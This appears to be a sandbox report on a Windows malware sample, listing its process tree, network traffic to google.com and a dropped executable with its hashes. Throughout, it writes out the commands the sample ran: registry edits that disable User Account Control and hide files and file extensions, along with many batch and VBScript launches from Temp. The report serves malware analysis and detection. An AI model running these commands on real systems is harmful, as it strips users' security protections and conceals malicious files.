cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\jwQQkIYw.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\QAEMIcMY.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\UqkcEogQ.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\jOowgccM.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\XaocYAws.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\OEsUcEwY.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\uMAUEgws.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\AMksUMQI.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\bKAcgwIU.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\vqkcocMY.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\aKYIAUso.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\ZOMIUsYc.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\zmcYYgEk.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\HGIYccUs.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\xGQUkkoE.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\lwcUUMQI.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\XMEsgoYw.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\wWAoEIYw.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\ywgYMAEk.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\xqAQMwAA.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\cwUAsAEk.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\oUAkQQAA.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\naQwIEoE.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\YegYQAME.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\XaosYIgQ.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\BGcsgsQI.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\TQggIEoE.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\XucwwoYw.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\nmMAsIok.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\SQIYwcEg.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\mEcEMIQE.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\YkIkAcEg.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\hsIAEwsk.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\qYEMwkgM.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\tqskAIQE.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\aAgIQIQE.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\RUskowsk.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\uCYkwgoA.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\ewwIoUcc.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\kQAwkcEg.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\DEsYUAoA.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\iCAoQIQE.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\jEMEUcEg.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\oaAYMQsk.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\eAQAkcEg.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | google.com | udp |
| GB | 172.217.169.78:80 | google.com | tcp |
| GB | 172.217.169.78:80 | google.com | tcp |
| GB | 172.217.169.78:80 | google.com | tcp |
| US | 8.8.8.8:53 | google.com | udp |
| GB | 172.217.169.78:80 | google.com | tcp |
Files
memory/2472-0-0x0000000000400000-0x000000000047A000-memory.dmp
\Users\Admin\kSkcMIIs\duUEccEA.exe
| MD5 | cb32c721ef5316939175779387393f09 |
| SHA1 | 064751b2765d7391b9fcb65e64ebaffa18fe2545 |
